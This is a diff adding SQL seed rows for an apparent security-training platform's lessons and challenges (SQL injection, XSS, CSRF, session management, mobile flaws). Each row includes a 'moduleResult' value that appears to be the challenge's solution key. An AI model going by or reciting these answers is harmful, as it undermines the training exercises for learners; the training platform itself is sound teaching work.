+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a', 'Content Provider Leakage', 'content.provider.leakage', 'lesson', 'Mobile Content Provider', 'mobile.content.provider', 'LazerLizardsFlamingWizards', '4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39', 'open', '79', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson', 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input', 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('52885a3db5b09adc24f38bc453fe348f850649b3', 'Reverse Engineering 1', 'reverse.engineering.1', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'christopherjenkins', '072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295', 'open', '85', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b6432a6b5022cb044e9946315c44ab262ab59e88', 'Unvalidated Redirects and Forwards', 'unvalidated.redirects.and.forwards', 'lesson', 'Unvalidated Redirects and Forwards', 'unvalidated.redirects.and.forwards', '658c43abcf81a61ca5234cfd7a2', 'f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f', 'open', '86', '45', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('335440fef02d19259254ed88293b62f31cccdd41', 'Client Side Injection', 'client.side.injection', 'lesson', 'Mobile Injection', 'mobile.injection', 'VolcanicEruptionsAbruptInterruptions', 'f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1', 'open', '87', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f771a10efb42a79a9dba262fd2be2e44bf40b66d', 'SQL Injection 2', 'sql.injection.2', 'challenge', 'Injection', 'injection', 'f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3', 'ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b', 'open', '88', '45', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298', 'NoSQL Injection One', 'nosql.injection.one', 'challenge', 'Injection', 'injection', 'c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a', 'd63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66', 'open', '89', '45', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0cdd1549e7c74084d7059ce748b93ef657b44457', 'Poor Authentication', 'poor.authentication', 'lesson', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'UpsideDownPizzaDip', '77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e', 'open', '90', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ef6496892b8e48ac2f349cdd7c8ecb889fc982af', 'Broken Crypto', 'broken.crypto', 'lesson', 'Mobile Broken Crypto', 'mobile.broken.crypto', '33edeb397d665ed7d1a580f3148d4b2f', '911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212', 'open', '97', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f16bf2ab1c1bf400d36330f91e9ac6045edcd003', 'Reverse Engineering 2', 'reverse.engineering.2', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'FireStoneElectric', '5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1', 'open', '98', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c685f8102ae0128c2ab342df64699bb8209a0839', 'SQL Injection Escaping', 'sql.injection.escaping', 'challenge', 'Injection', 'injection', '0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac', '8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4', 'open', '99', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b70a84f159876bb9885b6e0087d22f0a52abbfcf', 'Session Management Challenge 2', 'session.management.challenge.2', 'challenge', 'Session Management', 'session.management', '4ba31e5ffe29de092fe1950422a', 'd779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7', 'open', '105', '55', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('20e755179a5840be5503d42bb3711716235005ea', 'CSRF 1', 'csrf.1', 'challenge', 'CSRF', 'csrf', '7639c952a191d569a0c741843b599604c37e33f9f5d8eb07abf0254635320b07', 's74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52', 'open', '106', '55', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', 'Session Management Challenge 3', 'session.management.challenge.3', 'challenge', 'Session Management', 'session.management', 'e62008dc47f5eb065229d48963', 't193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3', 'open', '115', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('307f78f18fd6a87e50ed6705231a9f24cd582574', 'Insecure Data Storage 1', 'insecure.data.storage.1', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'WarshipsAndWrenches', '362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01', 'open', '116', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3f010a976bcbd6a37fba4a10e4a057acc80bdc09', 'Broken Crypto 1', 'broken.crypto.1', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'd1f2df53084b970ab538457f5af34c8b', 'd2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717', 'open', '117', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', 'Cross Site Scripting 2', 'cross.site.scripting.2', 'challenge', 'XSS', 'xss', '495ab8cc7fe9532c6a75d378de', 't227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888', 'open', '119', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9e46e3c8bde42dc16b9131c0547eedbf265e8f16', 'Reverse Engineering 3', 'reverse.engineering.3', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'C1babd72225f0e9934YZ8', 'dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b', 'open', '120', '76', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0709410108f91314fb6f7721df9b891351eb2fcc', 'Insecure Cryptographic Storage Challenge 2', 'insecure.cryptographic.storage.challenge.2', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'TheVigenereCipherIsAmethodOfEncryptingAlphabeticTextByUsingPoly', 'h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177', 'open', '126', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('82e8e9e2941a06852b90c97087309b067aeb2c4c', 'Insecure Direct Object Reference Challenge 2', 'insecure.direct.object.reference.challenge.2', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', '1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f', 'vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4', 'open', '127', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', 'Cross Site Scripting 3', 'cross.site.scripting.3', 'challenge', 'XSS', 'xss', '6abaf491c9122db375533c04df', 'ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e', 'open', '128', '65', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('da3de2e556494a9c2fb7308a98454cf55f3a4911', 'Insecure Data Storage 2', 'insecure.data.storage.2', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'starfish123', 'ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4', 'open', '129', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cb7d696bdf88899e8077063d911fc8da14176702', 'Insecure Data Storage 3', 'insecure.data.storage.3', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'c4ptainBrunch', '11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851', 'open', '130', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('de626470273c01388629e5a56ac6f17e2eef957b', 'Insecure Direct Object Reference Bank', 'insecure.direct.object.reference.bank', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', '4a1df02af317270f844b56edc0c29a09f3dd39faad3e2a23393606769b2dfa35', '1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c', 'open', '131', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f40b0cd5d45327c9426675313f581cf70c7c7c28', 'Unintended Data Leakage 1', 'unintended.data.leakage.1', 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', 'BagsofSalsa', '517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136', 'open', '132', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', 'SQL Injection 3', 'sql.injection.3', 'challenge', 'Injection', 'injection', '9815 1547 3214 7569', 'b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6', 'open', '135', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('94cd2de560d89ef59fc450ecc647ff4d4a55c15d', 'CSRF 2', 'csrf.2', 'challenge', 'CSRF', 'csrf', '45309dbaf8eaf6d1a5f1ecb1bf1b6be368a6542d3da35b9bf0224b88408dc001', 'z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e', 'open', '136', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', 'CSRF 3', 'csrf.3', 'challenge', 'CSRF', 'csrf', '6bdbe1901cbe2e2749f347efb9ec2be820cc9396db236970e384604d2d55b62a', 'z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c', 'open', '137', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4', 'Client Side Injection 1', 'client.side.injection.1', 'challenge', 'Mobile Injection', 'mobile.injection', 'SourHatsAndAngryCats', '8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef', 'open', '138', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cfbf7b915ee56508ad46ab79878f37fd9afe0d27', 'CSRF 4', 'csrf.4', 'challenge', 'CSRF', 'csrf', 'bb78f73c7efefec25e518c3a91d50d789b689c4515b453b6140a2e4e1823d203', '84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5', 'open', '139', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9', 'Unintended Data Leakage 2', 'unintended.data.leakage.2', 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', '627884736748', '85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7', 'open', '140', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('fcc1918e0a23b8420e173cf8029876cb887408d3', 'CSRF JSON', 'csrf.json', 'challenge', 'CSRF', 'csrf', 'f57f1377bd847a370d42e1410bfe48c9a3484e78d50e83f851b634fe77d41a6e', '2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb', 'open', '141', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ced925f8357a17cfe3225c6236df0f681b2447c4', 'Session Management Challenge 4', 'session.management.challenge.4', 'challenge', 'Session Management', 'session.management', '238a43b12dde07f39d14599a780ae90f87a23e', 'ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6', 'open', '145', '75', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('182f519ef2add981c77a584380f41875edc65a56', 'Cross Site Scripting 4', 'cross.site.scripting.4', 'challenge', 'XSS', 'xss', '515e05137e023dd7828adc03f639c8b13752fbdffab2353ccec', '06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751', 'open', '146', '75', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'SQL Injection 4', 'sql.injection.4', 'challenge', 'Injection', 'injection', 'd316e80045d50bdf8ed49d48f130b4acf4a878c82faef34daff8eb1b98763b6f', '1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629', 'open', '147', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b3cfd5890649e6815a1c7107cc41d17c82826cfa', 'Insecure Cryptographic Storage Challenge 3', 'insecure.cryptographic.storage.challenge.3', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'THISISTHESECURITYSHEPHERDABCENCRYPTIONKEY', '2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1', 'open', '148', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('63bc4811a2e72a7c833962e5d47a41251cd90de3', 'Broken Crypto 2', 'broken.crypto.2', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'DancingRobotChilliSauce', 'fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc', 'open', '149', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('e635fce334aa61fdaa459c21c286d6332eddcdd3', 'Client Side Injection 2', 'client.side.injection.2', 'challenge', 'Mobile Injection', 'mobile.injection', 'BurpingChimneys', 'cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425', 'open', '155', '80', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0a37cb9296ff3763f7f3a45ff313bce47afa9384', 'CSRF 5', 'csrf.5', 'challenge', 'CSRF', 'csrf', '8f34078ef3e53f619618d9def1ede8a6a9117c77c2fad22f76bba633da83e6d4', '70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49', 'open', '156', '80', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3', 'Poor Data Validation 2', 'poor.data.validation.2', 'challenge', 'Poor Data Validation', 'poor.data.validation', '05adf1e4afeb5550faf7edbec99170b40e79168ecb3a5da19943f05a3fe08c8e', '20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5', 'open', '157', '80', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c', 'Poor Authentication 1', 'poor.authentication.1', 'challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MegaKillerExtremeCheese', 'efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467', 'open', '160', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c7ac1e05faa2d4b1016cfcc726e0689419662784', 'Failure to Restrict URL Access 2', 'failure.to.restrict.url.access.2', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', '40b675e3d404c52b36abe31d05842b283975ec62e8', '278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa', 'open', '165', '85', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('fccf8e4d5372ee5a73af5f862dc810545d19b176', 'Cross Site Scripting 5', 'cross.site.scripting.5', 'challenge', 'XSS', 'xss', '7d7cc278c30cca985ab027e9f9e09e2f759e5a3d1f63293', 'f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671', 'open', '166', '85', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2','challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts', '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'SQL Injection 5', 'sql.injection.5', 'challenge', 'Injection', 'injection', '343f2e424d5d7a2eff7f9ee5a5a72fd97d5a19ef7bff3ef2953e033ea32dd7ee', '8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62', 'open', '175', '90', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5', 'CSRF 6', 'csrf.6', 'challenge', 'CSRF', 'csrf', 'df611f54325786d42e6deae8bbd0b9d21cf2c9282ec6de4e04166abe2792ac00', '2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569', 'open', '176', '90', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'SQL Injection Stored Procedure', 'sql.injection.stored.procedure', 'challenge', 'Injection', 'injection', 'd9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8', '7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7', 'open', '177', '90', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1', 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry', '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3b1af0ad239325bf494c6e606585320b31612e72', 'Broken Crypto 3', 'broken.crypto.3', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'ShaveTheSkies', 'f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34', 'open', '180', '180', 1, 0);
